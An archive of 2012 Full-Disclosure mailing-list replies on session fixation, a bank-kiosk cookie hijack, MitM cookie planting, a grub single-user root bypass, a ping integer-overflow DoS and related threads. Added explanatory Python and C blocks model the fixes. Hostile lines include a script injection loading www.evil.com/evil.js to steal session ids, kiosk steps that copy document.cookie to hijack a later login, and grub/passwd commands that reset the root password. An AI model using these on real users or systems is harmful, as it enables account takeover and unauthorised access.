> Predefined Post Authentication Session ID Vulnerability is a Vendor-neutral vulnerability and it lets attackers design new attack scenarios. A lot of web applications on the Internet are affected by this vulnerability.
>
> ---
> Vulnerability Name: Predefined Post Authentication Session ID Vulnerability
> Type: Improper Session Handling
> Impact: Session Hijacking
> Level: Medium
> Date: 10.07.2012
> Vendor: Vendor-neutral
> Issuer: Gokhan Muharremoglu
> E-mail: gokhan.muharremo...@iosec.org
>
> VULNERABILITY
>
> If a web application starts a session and defines a session id before a user is authenticated, this session id must be changed after a successful authentication. If the web application uses the same session id before and after authentication, any legitimate user who has gained the before-authentication session id can hijack future after-authentication sessions too.
>
> MITIGATION
>
> To avoid this vulnerability, sessions must be regenerated after a successful login.
>
> In a session fixation attack, the attacker fixates (sets) another person's (the victim's) session identifier because the session id is never regenerated and validated; this vulnerability can also lead to the Session Fixation attack etc.
>
> Gokhan Muharremoglu
> Information Security Specialist (CEH, ECSA, CIW-Web Security Professional, Security+, EXIN 27002 ISFS)
>
> -----Original Message-----
> From: Jann Horn [mailto:jannh...@googlemail.com]
> Sent: Friday, July 13, 2012 2:06 AM
> To: Gokhan Muharremoglu
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
>
> On Wed, Jul 11, 2012 at 11:34:11AM +0300, Gokhan Muharremoglu wrote:
>
> > VULNERABILITY
> >
> > If a web application starts a session and defines a session id before a user is authenticated, this session id must be changed after a successful authentication. If the web application uses the same session id before and after authentication, any legitimate user who has gained the before-authentication session id can hijack future after-authentication sessions too.
>
> Uh, so, erm, you assume that someone can steal my cookie/set it/whatever although the Same Origin Policy should clearly not allow that, and then, after I have logged in, he can't just steal my cookie? Unless you allow setting the session-ID via a URL or so (which would IMO be pretty stupid), I can't see how this is a realistic, vendor-neutral attack. Could you explain this a bit better? I don't get it.
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Exactly, a niche scenario. I never said it /wasn't/ a vulnerability, only that it doesn't warrant the severity you claim. Also again, a situation where there are better things for an attacker to do. Yes you could do that to grab the session id, or what's stopping you from writing javascript;document.write('script type=text/javascript src=www.evil.com/evil.js/script)? Presumably evil.js doing all sorts of nasty such as grabbing the session id and storing it remotely. Yes I'm aware you claimed policies are in place, but I'm curious if that approach was tried.

Or better yet, why not just load an iframe of the site's app itself? There's all sorts of known nasties you can do with iframes, why not intercept all the requests to the iframe (wiping out the main page with more js so things are transparent) and then store the stolen values of logins to a cookie? Screw the session id, you can get full logins that way. All you would need to do is swing by and do your javascript;alert(document.cookie); to fetch the results.

Also I'm no expert in javascript or heck even in web applications. That was just my first idea from a very basic knowledge, therefore we can assume that any remotely dedicated attacker can probably come up with an even cleaner solution, but the point still stands: If you are worried about this vulnerability, you have bigger issues, ergo why are you even worried? To me it'd be a lot like worrying if you are salting your passwords stored in a database properly when you are only xoring them. Yeah sure good salts are important to consider in isolation, but in that case you have bigger fish to fry. In this situation the bigger fish to fry is 'the attacker can run arbitrary js on the victim's side'.

As to the XSS, that just illustrates my smaller point that your PoC is extremely vague. I only figured it out while I was typing my original email, and that was going off my own testing and ignoring your instructions which were only misleading me. Judging by some of the other responses here, I'd be hesitant to say I was the only one. Might wanna think about what's the common denominator here.

On Fri, Jul 13, 2012 at 4:23 AM, Gokhan Muharremoglu gokhan.muharremo...@iosec.org wrote:

> Ok. It seems I have to explain this vulnerability's effects with another scenario. This is a real life scenario and I wrote it in a Turkish article for the National Information Security Portal which is run by TUBITAK.
>
> Article in Turkish with scenario = http://www.iosec.org/oturum_oncesi_tanimli_cerez.pdf
>
> I will explain it in English now. There are KIOSK/Terminal machines at bank branches in Turkey. Customers can reach the regular Internet banking application from here. But these machines are restricted with policies and you cannot view any other web site or close the browser page. But you can type in to the address bar. All you can do is to enter the bank's internet web application.
>
> Here is the scenario (taken from real life):
>
> 1. Type javascript:alert(document.cookie) to the address bar and copy all information including Session ID.
> 2. Wait for a victim who logs in to the KIOSK.
> 3. After he/she logs in, use your copied Session ID to login as him/her.
>
> In this scenario;
> There was no same-origin restriction,
> There was no httpOnly cookie tag.
>
> Always remember A chain is only as strong as its weakest link. This is a vulnerability, it's the attacker's and conditions' decision how to use it. You can use a wider vision to consider real life scenarios.
>
> Gokhan Muharremoglu
>
> -----Original Message-----
> From: Gage Bystrom [mailto:themadichi...@gmail.com]
> Sent: Friday, July 13, 2012 1:40 PM
> To: Gokhan Muharremoglu; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
See now this is something I can get behind, as that's a scenario where this attack can achieve something that arbitrary js normally could not do, or at least I'm more uncertain if other methods would work in that situation, and it's a situation that is going to be reasonably common and not some super niche scenario. So thanks.

As for OP, it's sad if you don't care about the context of a vulnerability at all, but if that's your choice then fine but it's gunna be your loss in the long run.

On Jul 13, 2012 9:07 AM, Tim tim-secur...@sentinelchicken.org wrote:

> I have not read the PoC. Nor do I care to. However, I do want to point out one aspect of session fixation that I think many people overlook, as I think has been indicated by some responses on this thread. If this is not news to many of you, I apologize. Just trying to raise awareness.
>
> Suppose an application runs solely over HTTPS and assigns cookies with the secure flag. However, user sessions are assigned before login and they don't refresh their session cookies upon user login. In this case, users are still vulnerable to MitM:
>
> 1. An attacker gains access to view and modify unencrypted traffic between a user and the application.
>
> 2. The attacker accesses the site (in this case: https://example.com/) as an unauthenticated user and obtains a session cookie.
>
> 3. A victim's browser, at some point before the victim logs in to the application, makes a request to any non-HTTPS web page. (This could include web mail sites, search engines, etc.) Let's call this site third-party.example.org for the sake of argument.
>
> 4. Attacker injects into an HTTP response (coming from third-party.example.org) which causes the victim's browser to request some page under the non-SSL version of example.com. This could happen through a redirect, injection of an image tag, or any number of other things. Anything to force the victim's browser to send one request to the HTTP version of example.com is sufficient.
>
> 5. Upon attempting to access the HTTP version of the vulnerable application (which of course doesn't exist), the attacker again intercepts this and replaces the HTTP response. In this response, a Set-Cookie header is included which provides the victim's browser with the application session that the attacker retrieved in step 2.
>
> 6. Later, the victim logs into the application normally. Even though the session cookie was assigned over a faux HTTP version of the site without the secure flag set, the victim's browser sends it along to the HTTPS site without knowing the difference. The site can't tell the cookie was set insecurely.
>
> 7. Since the attacker knows the session cookie, the account can be easily hijacked once the victim establishes an authenticated session with it.
>
> This is complicated, but it's not that much more complicated than what existing MitM tools, such as sslstrip, already do.
>
> Note that another variant of this attack is possible if the victim's browser silently accepts third-party cookies (which most do by default) and is able to convince a user to visit any malicious site. In this case, no MitM is necessary.
>
> Using HTTP cookies for session authentication is, and always has been, a bad idea. They are simply not designed for this application. We need something better.
>
> tim
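As an added example, not code from Tim, Gokhan or anyone else in the thread: a Python model of the server-side behaviour behind the advisory's MITIGATION section and Tim's steps 2 to 7, run once with the pre-login id kept at login and once with it regenerated. The class and function names, the user "alice" and the cookie name are constructed for this example.

```python
"""Session fixation: pre-login session id kept vs. regenerated at login.

Models the two scenarios in the thread with an in-memory session store:
Tim's steps 2-7 (attacker obtains an anonymous id and plants it in the
victim's browser) and Gokhan's kiosk case (attacker copies the id from
document.cookie before the victim logs in). The question is the same in
both: does the id the attacker already knows become an authenticated
session when the victim logs in?
"""
import secrets
from typing import Dict, Optional


class SessionStore:
    """Minimal server-side session store (constructed for this example)."""

    def __init__(self, regenerate_on_login: bool) -> None:
        self.regenerate_on_login = regenerate_on_login
        self._sessions: Dict[str, Dict[str, Optional[str]]] = {}

    @staticmethod
    def _new_id() -> str:
        # 256 bits from the OS CSPRNG. Guessing is not the attack here;
        # knowing the id beforehand is.
        return secrets.token_urlsafe(32)

    def new_session(self) -> str:
        """Anonymous session handed out on first visit, before any login."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid: str, user: str) -> str:
        """Authenticate and return the id the browser must use from now on."""
        data = self._sessions.pop(presented_sid, None)
        if data is None:
            # Never adopt an id this server did not issue (fixation via a
            # forged cookie); start from an empty session instead.
            data = {"user": None}
            sid = self._new_id()
        elif self.regenerate_on_login:
            # The advisory's mitigation: the pre-login id is discarded, so
            # anyone holding it holds nothing.
            sid = self._new_id()
        else:
            # Vulnerable behaviour: the pre-login id simply becomes
            # authenticated (Tim's step 6).
            sid = presented_sid
        data["user"] = user
        self._sessions[sid] = data
        return sid

    def whoami(self, sid: str) -> Optional[str]:
        """User bound to sid, or None if the session is anonymous/unknown."""
        data = self._sessions.get(sid)
        return None if data is None else data["user"]


def fixation_scenario(store: SessionStore, victim: str = "alice") -> Dict[str, Optional[str]]:
    """Replay the thread's attack against a store; returns what each side sees."""
    # Tim's step 2 / kiosk step 1: attacker holds a server-issued anonymous id.
    planted_sid = store.new_session()
    # Steps 3-5: that id ends up in the victim's cookie jar (Set-Cookie forged
    # over the faux HTTP site, or simply left behind in the kiosk browser).
    victim_cookie = planted_sid
    # Step 6: victim logs in; the browser keeps whatever id the server returns.
    victim_cookie = store.login(victim_cookie, victim)
    # Step 7: attacker presents the id they planted.
    return {
        "attacker_sees": store.whoami(planted_sid),
        "victim_sees": store.whoami(victim_cookie),
    }


def set_cookie_header(sid: str) -> str:
    """Set-Cookie value for the regenerated id.

    Secure and HttpOnly address the kiosk case (document.cookie) and plain
    HTTP leakage. The __Host- prefix is a browser rule added after this
    thread (cookie prefixes, RFC 6265bis): a cookie with that name is only
    stored if set from a secure origin with Secure, Path=/ and no Domain,
    so the Set-Cookie forged over HTTP in Tim's step 5 is dropped.
    """
    return f"__Host-sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for label, store in (("vulnerable", SessionStore(regenerate_on_login=False)),
                         ("fixed", SessionStore(regenerate_on_login=True))):
        print(label, fixation_scenario(store))
```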
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Well if I understand Tim correctly you wouldn't need a CA. In the attack he mentioned not once do you ever actually look at the ssl content. He's talking about redirecting them to plain http and then setting the session cookie and redirecting them back. Then when the victim logs on over ssl, the session cookie isn't changed and is treated as authenticated. Obviously since you set the cookie, you know what it is and can then impersonate them.

I also agree that it probably wouldn't take too much effort to make that work, anything that can modify traffic ought to do the job easily enough with some tweaking. If not it wouldn't take much effort to whip up something specialized.

On Jul 13, 2012 11:15 AM, Douglas Huff m...@jrbobdobbs.org wrote:

> On Jul 13, 2012, at 11:07, Tim tim-secur...@sentinelchicken.org wrote:
>
> > This is complicated, but it's not that much more complicated than what existing MitM tools, such as sslstrip, already do.
>
> Better. I'm fairly certain this entire attack could be automated/orchestrated with mitmproxy with close to zero code changes. Only hard part is the procurement of a ca that will work on the target or finding some behind the firewall app to target that already uses a self-signed/invalid cert the users are used to clicking through.
Re: [Full-disclosure] Please remove my e-mail and IP from internet
Not to mention as others pointed out it is implied that the guy might've let out information he didn't have permission to let out, which could get him into some serious trouble. Also I could be wrong since I don't remember the full thing but did the guy say they were doing a pentest soon? No need to report the guy when any remotely competent pentest team is gunna find this and probably start laughing :)

On Jul 3, 2012 8:18 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote:

> On 29/06/2012 06:47, Tonu Samuel wrote:
>
> > Really funny thread is going on in Postfix-Users list. Scroll down about half of content here: http://comments.gmane.org/gmane.mail.postfix.user/227441
> >
> > Just good example how NOT to do.
>
> I fwd'd details to Lester Haines of vulture central fame but doubt he will see it as a story.
>
> This outsourced Orange sysadmin really needs the Streisand effect to hit him and Orange - hard!
>
> Has anyone contacted any of the email addresses in the logs pointing out the disclosure? I suspect Kia as a company may not be too happy that a SAP reports email address has been disclosed. Far easier to socially engineer something when you have even this minor sort of info.
>
> Jacqui
Re: [Full-disclosure] WordPress Authenticated File Upload Authorisation Bypass
To me it seems like he's trying to say that someone with administrative access has the ability to have administrative access. It's like saying Hey guys! I found a local exploit and all it requires is to be a root user!!! I'm not sure if he's trolling or just stupid.

On Thu, Jun 21, 2012 at 7:42 AM, Greg Knaddison greg.knaddi...@acquia.com wrote:

> On Wed, Jun 20, 2012 at 8:04 PM, Denis Andzakovic denis.andzako...@security-assessment.com wrote:
>
> > Exploitation of this vulnerability requires a malicious user with access to the admin panel to use the /wp-admin/plugin-install.php?tab=upload page to upload a malicious file.
>
> That tool is meant to allow an admin to upload arbitrary php plugins. You can argue that this feature is insecure by design, but there are two solutions from the WordPress perspective:
>
> 1) Don't grant malicious users the permission to install plugins.
> 2) If you don't want this feature on your site at all, this feature can be disabled in the config:
>
>     define( 'DISALLOW_FILE_MODS', TRUE );
>
> By the way, two more vulnerabilities: the theme installer has this same issue and the upgrade tool could also be abused if you can poison the DNS of the server.
>
> Regards,
> Greg
Re: [Full-disclosure] server security
Well that's a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you weren't running on a default port one day.

On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote:

> We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind, changing to 1025 for example removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble.
>
> Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one.
>
> Rob
>
> -----Original Message-----
> From: Alex Dolan dolan.a...@gmail.com
> Sender: listbou...@securityfocus.com
> Date: Thu, 21 Jun 2012 07:44:57
> To: Littlefield, Tyler ty...@tysdomain.com
> Cc: security-bas...@securityfocus.com
> Subject: Re: server security
>
> > One tip I have is to set SSH to a port other than 22, I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk
> >
> > On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote:
> >
> > > Hello:
> > > I have a couple questions. First, I'll explain what I did:
> > > I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags).
> > > 2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk.
> > > 3) I installed aid.
> > > 4) disabled malformed packets and forwarding/etc in sysctl.
> > >
> > > This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended? Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc, what kind of preventative measures exist for this?
> > >
> > > --
> > > Take care,
> > > Ty
> > > http://tds-solutions.net
> > > The aspen project: a barebones light-weight mud engine: http://code.google.com/p/aspenmud
> > > He that will not reason is a bigot; he that cannot reason is a fool; he that dares not reason is a slave.
Re: [Full-disclosure] Info about attack trees
Never read any of his pieces on attack trees. That being said, and having read over it, I believe it to be infeasible to make an attack tree against any modern system, even with only the scope of web applications. There are simply a vast number of possible start points, and what leaves may exist all depend on what information you gather. As in, while building an attack tree you might have to add leaves as you attack the application. Such a final attack tree would be amazingly complex. If OP wants to go for that then that's his choice, but to be frank I believe there are more productive uses of someone's time.

On Mon, May 28, 2012 at 7:20 AM, Peter Dawson slash...@gmail.com wrote:

== there are no such thing as an attack tree.

Eh?? Seems that Schneier was blowing smoke up in the air with his thoughts on attack trees!! Anyhoot, here's another good old linky: Military Operations Research V10, N2, 2005, http://www.innovativedecisions.com/documents/Buckshaw-Parnelletal.pdf

/pd

On Fri, May 25, 2012 at 9:46 AM, Daniel Hadfield d...@pingsweep.co.uk wrote:

You can create an XSS with a SQLi. If you can output on the page, you can inject HTML/JS with that variable.

On 25/05/2012 09:58, Federico De Meo wrote:

Hello everybody, I'm new to this mailing list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some information about attack tree usage in web application analysis. For my master's thesis I decided to study the usage of this formalism in order to represent attacks on web applications. I need a lot of use cases from which to start learning common attacks which can help in building a proper tree. From where can I start? I've already read the OWASP top 10 vulnerabilities and I'm familiar with XSS, SQLi, etc.; however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe some famous attacks from which I can understand which steps are performed and how common vulnerabilities can be combined together. Any help is really appreciated.

--- Federico.
Re: [Full-disclosure] Info about attack trees
If you haven't guessed from the replies, there is no such thing as an attack tree. Sure, things may be methodical, but I don't think of things as being like a tree. The classical method is something along the lines of: perform recon, enumerate, attack, persist/extract data. You react based upon the information you gather; the more information you have, the clearer it is what the next step ought to be. No offense, but I don't think it'd be a good idea to make a master's thesis about the textbook methodology of a field you are not familiar with, especially since you seem to be diving into it with multiple misconceptions and assumptions.

On May 25, 2012 5:51 AM, Federico De Meo ade...@gmail.com wrote:

Hello everybody, I'm new to this mailing list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some information about attack tree usage in web application analysis. For my master's thesis I decided to study the usage of this formalism in order to represent attacks on web applications. I need a lot of use cases from which to start learning common attacks which can help in building a proper tree. From where can I start? I've already read the OWASP top 10 vulnerabilities and I'm familiar with XSS, SQLi, etc.; however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe some famous attacks from which I can understand which steps are performed and how common vulnerabilities can be combined together. Any help is really appreciated.

--- Federico.
Re: [Full-disclosure] Google Accounts Security Vulnerability
I think what he was trying to say, and I'm not sure since I haven't tested it, is that you can bypass the 2nd layer of authentication by logging into IMAP. 'Cause normally if you try to login from a strange device Google becomes highly suspicious and starts asking you questions (the 2nd layer), and he's saying that if you have the first layer covered, you can use IMAP to avoid the second. I don't know for sure, I just think that's what he is trying to say.

On May 16, 2012 1:51 AM, Jason Hellenthal jhellent...@dataix.net wrote:

On Tue, May 15, 2012 at 06:29:03PM -0700, Michael J. Gray wrote:

I’ll clarify a bit. If you log on to your Google account from the website and it prompts you for additional security questions, you can circumvent this by simply checking mail via POP or what have you and then it adds your IP address to the list of recognized addresses.

I don't know about anyone else, but I use two step verification with specific application pass phrases that Google so graciously allows you to do. With that said... It is the two phase authentication I chose to turn on due to the fact I have to access my mail through IMAPS. One thing I think you may be entirely confused with is the Allow multiple logins feature that you can turn off and achieve exactly what you would expect to happen.

? What I don't understand is... You go to your web portal to reset your password... you do not know what your password is...! How on earth would you login to IMAP, POP, whatever...! ?

PS: Besides, if someone was able to login to your IMAP I sincerely doubt accessing your mail by the web will be on any one of the objective lists. They already have your =INBOX... Do use two phase authentication and do use application specific passwords for accessing your account.

From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
Sent: Tuesday, May 15, 2012 12:33 PM
To: Mateus Felipe Tymburibá Ferreira
Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Google Accounts Security Vulnerability

Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it. If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to logon to IMAP, which I find odd. Regardless, if you already know the username and password for the email, it doesn’t matter anyway now does it? You could always get the mail via IMAP or POP or whatever options were configured in gmail. There wouldn’t be any need to go to the web interface in the first place. Now that I know I’m not missing anything, I’ll just let this one die on the vine.

Timothy “Thor” Mullen
www.hammerofgod.com
Thor’s Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: Mateus Felipe Tymburibá Ferreira [mailto:mateusty...@gmail.com]
Sent: Tuesday, May 15, 2012 12:21 PM
To: Thor (Hammer of God)
Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability

I'm just copying the original message's part that probably answers your question (I did not test it...):

From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure.

Mateus Felipe Tymburibá Ferreira, M. Sc. student at UFAM http://portal.ufam.edu.br
CISSP https://www.isc2.org/cissp/default.aspx, OSCP http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/, OSCE http://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/, OSWP http://www.offensive-security.com/information-security-certifications/oswp-offensive-security-wireless-professional/
Re: [Full-disclosure] [OT] New online service to make XSSs easier
Anyone visiting a compromised site can get the hash, meaning anyone who is looking for it can find it, and it lets any random person (assuming stored) visiting be able to grab all the cookie values. That's not even my personal concern. My concern is why should I trust the owner? Whether you are a black hat, white hat, or myriad of other assorted hats, you would be allowing sensitive information to sit on this guy's server. How do we know he isn't silently making a copy of all the data for his own ends? Simply, we don't.

On Mon, May 7, 2012 at 6:03 AM, valdis.kletni...@vt.edu wrote:

On Mon, 07 May 2012 02:27:33 +0530, karniv0re said:

And this is anonymous.. How??

Haven't checked, but if you set up the userid/password via Tor, should be pretty anonymous.

http://www.getmycookie.com/view.m3?hash=insert_hash_here

And you get somebody else's hash value, how?
Re: [Full-disclosure] Vulnerability in Backtrack
*sigh* vulnerability reports like this make me sad.

On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote:

Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account.

E.g.:
grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER]
grub edit b
# mount -t proc proc /proc
# mount -o remount,rw /
# passwd [ENTER IS ANYTHING YOU WANT]
# sync
# reboot

I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute

-- `Wherever I is go - there am I routed`
Re: [Full-disclosure] Vulnerability in Backtrack
Next thing ya know he will publish a disclosure on the default password being toor.

On Apr 24, 2012 7:41 AM, Urlan urlanc...@gmail.com wrote:

It makes me laugh! hahahaha

2012/4/24 Gage Bystrom themadichi...@gmail.com

*sigh* vulnerability reports like this make me sad.

On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote:

Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account.

E.g.:
grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER]
grub edit b
# mount -t proc proc /proc
# mount -o remount,rw /
# passwd [ENTER IS ANYTHING YOU WANT]
# sync
# reboot

I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute

-- `Wherever I is go - there am I routed`
Re: [Full-disclosure] nullsec-bypass-aslr.pdf - ASLR / ASLR bypass techniques
Eh, nothing really exciting or noteworthy in it. Could serve as a good overview, but there are better techniques actively being used that solve multiple other problems as well (ROP comes to mind, although not always).

On Sun, Apr 15, 2012 at 11:01 AM, Levent Kayan levonka...@gmx.net wrote:

a salam alaikum list,

a nicely written paper by TheXero, who wants to share y0u: A paper discussing ASLR (Address Space Layout Randomization) and techniques to evade the protection. You can find the paper at: http://www.nullsecurity.net/papers.html

cheers,
noobtrix

--
Name: Levon 'noptrix' Kayan
E-Mail: nopt...@nullsecurity.net
GPG key: 0x014652c0
Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
Homepage: http://www.nullsecurity.net/
Re: [Full-disclosure] keeping data safe offline
The best you could do without internet access to store the keys is to implement a strong crypting method in the app itself and use every trick you can that would piss off a reverse engineer.

On Apr 9, 2012 2:26 PM, Erki Männiste erki.manni...@webmedia.ee wrote:

I am developing a software that is going to be distributed to end-users on USB sticks. The application and the content will be stored on that device, and the content will be stored in a one-file sqlCE database; it will be crypted by default and will be encrypted by the application on-the-fly. My client has made it clear that he wants to keep end-users from copying the content and using it on any other device but that very stick. Now, due to the offline requirement this is impossible to achieve, because I have to store the encryption key somewhere in the code and users are able to access the data while in unencrypted state. Can anybody recommend me any mechanism that I could apply to make it more difficult for users to copy the content?

ERKI
Re: [Full-disclosure] Working to get more people to check if their infected with DNS Changer
You forget that the culprits have already been caught; no one is there in order to issue an update to circumvent the check site.

On Apr 4, 2012 9:55 AM, demonsdeba...@gmail.com wrote:

I see a hole in the "Check this site to test your DNS". A DNS spoofing attacker would change the NS, A or MX record for a certain targeted site, like Facebook. If you don't use DNSSEC or don't monitor (IDS/IPS) your DNS traffic, I just don't see how checking a certain site's DNS mapping would expose a malware infection?
Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools
Shoulda gotten a lawyer o.O Professor sex scandals can rake in decent money.

On Mar 13, 2012 4:32 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Tue, Mar 13, 2012 at 6:17 PM, Marcus Meissner meiss...@suse.de wrote:

Hi, How is this different from writing a fork bomb? :)

Fork bombs can be remediated with RLIMIT_NPROC. The runaway ping program needs to be fixed and then recompiled. I suppose you could say the same about runaway fork'd programs, though. I had one accidentally get away from me in college. The professor who performed the post-mortem was very impressive. He had me fingered in under an hour.

Jeff

On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote:

[ Description ]
An integer overflow was found in the iputils/ping_common.c main_loop() function which could lead to excessive CPU usage when triggered (could lead to DoS). This means that both ping and ping6 are vulnerable.

[ Proof-Of-Concept ]
Specify a big interval (-i option) for the ping/ping6 tool:
{{{
$ ping -i 3600 google.com
PING google.com (173.194.66.102) 56(84) bytes of data.
64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50 time=11.4 ms
[...]
}}}
And check your CPU usage (top, htop, etc.)

[ Explanation ]
Here, ping will loop in main_loop() in this section of code:
{{{
/* from iputils-s20101006 source */
/* ping_common.c */
546 void main_loop(int icmp_sock, __u8 *packet, int packlen)
547 {
[...]
559 	for (;;) {
[...]
572 		do {
573 			next = pinger();
574 			next = schedule_exit(next);
575 		} while (next <= 0);
[...]
588 		if ((options & (F_ADAPTIVE|F_FLOOD_POLL)) || next < SCHINT(interval)) {
[...]
593 			if (1000*next <= 100/(int)HZ) {
}}}
If the interval parameter (-i) is set, then the condition at L593 will overflow (i.e. value exceeding sizeof(signed integer)), making this statement always true for big values (e.g. -i 3600). As a consequence, the ping process will start looping actively as long as the condition is true (could be pretty long). As far as I looked, this bug is unlikely to be exploitable besides provoking Denial-Of-Service.

[ Affected versions ]
Tested on Fedora/Debian/Gentoo Linux systems (2.6.x x86_32 and x86_64) on iputils version 20101006. ping6 also seems to be affected since it relies on the same ping_common.c functions. Since iputils is not maintained any longer (http://www.spinics.net/lists/netdev/msg191346.html), the patch must be applied from source.

[ Patch ]
Quick'n dirty patch (full patch in appendix) is to cast the test result as long long:
{{{
593 			if (((long long)1000*next) <= (long long)100/(int)HZ) {
}}}

[ Credits ]
* Christophe Alladoum (HSC)
* Romain Coltel (HSC)
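To make the arithmetic behind the L593 check concrete, here is an added example (not iputils code and not from the advisory) that isolates the comparison: one version reproducing the 32-bit wraparound the advisory describes, one with the long long widening from the patch, plus an overflow pre-check. It assumes HZ = 100, the advisory's 100/(int)HZ right-hand side, and that `next` is held in milliseconds as in iputils.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Assumption: HZ as on most Linux builds; the advisory's comparison
 * uses 100/(int)HZ as its right-hand side, which is 1 here. */
#define PING_HZ 100
#define POLL_THRESHOLD (100 / (int)PING_HZ)

/* Emulates the original L593 test, "1000*next <= 100/(int)HZ", with the
 * 32-bit two's-complement wraparound the advisory describes. Signed
 * overflow is undefined behaviour in C, so the multiply is done in
 * unsigned arithmetic and cast back to make the wrap deterministic
 * (illustration only, not the iputils code). Returns true when ping
 * would take the busy-polling branch. */
bool busy_poll_wrapped(int next_ms) {
    int product = (int)(1000u * (unsigned)next_ms);
    return product <= POLL_THRESHOLD;
}

/* The check as the advisory's patch rewrites it: widen to long long
 * before multiplying, so a large -i no longer goes negative. */
bool busy_poll_fixed(int next_ms) {
    long long product = (long long)1000 * next_ms;
    return product <= (long long)POLL_THRESHOLD;
}

/* Pre-check a reviewer could add before the multiply: would 1000*next_ms
 * exceed INT_MAX? Any interval above INT_MAX/1000 ms (about 2147 s,
 * so "-i 2148" is the smallest whole-second value) trips this. */
bool mul_would_overflow(int next_ms) {
    return next_ms > INT_MAX / 1000;
}

/* ping's -i is given in seconds; the loop keeps next in milliseconds
 * (assumption based on the 1000*next scaling in the quoted code). */
int interval_to_next_ms(int interval_s) {
    return interval_s * 1000;
}

int main(void) {
    int intervals[] = {1, 2147, 2148, 3600};
    for (size_t i = 0; i < sizeof intervals / sizeof intervals[0]; i++) {
        int next = interval_to_next_ms(intervals[i]);
        printf("-i %4d: overflow=%d wrapped_busy_poll=%d fixed_busy_poll=%d\n",
               intervals[i], mul_would_overflow(next),
               busy_poll_wrapped(next), busy_poll_fixed(next));
    }
    return 0;
}
```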
Re: [Full-disclosure] Analysis of the r00t 4 LFI Toolkit
Uhh no, you misread what he said. He's saying he's seen that code in a few PHP shells that were supposedly meant to be private but the authors were miserable failures and he found the code anyways, not that he wrote it.

On Feb 20, 2012 12:36 AM, Manu sourvi...@gmail.com wrote:

But you saw it in a few priv8 php shells? And you say that is your code as 'r00t 4 LFI toolkit'? Pathetic

2012/2/19 InterN0T Advisories advisor...@intern0t.net

Thank you for the response, I didn't know it was included in the Weevely tool, but I did see it used in a few priv8 PHP shells too.

On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis bechtsoudi...@gmail.com wrote:

The backdoor PHP code that you included is exactly the same as generated by the Weevely [1] tool, until the 0.4 version of the tool. For convenience I include the base64 decoded Weevely code here too:

ini_set('error_log','/dev/null');
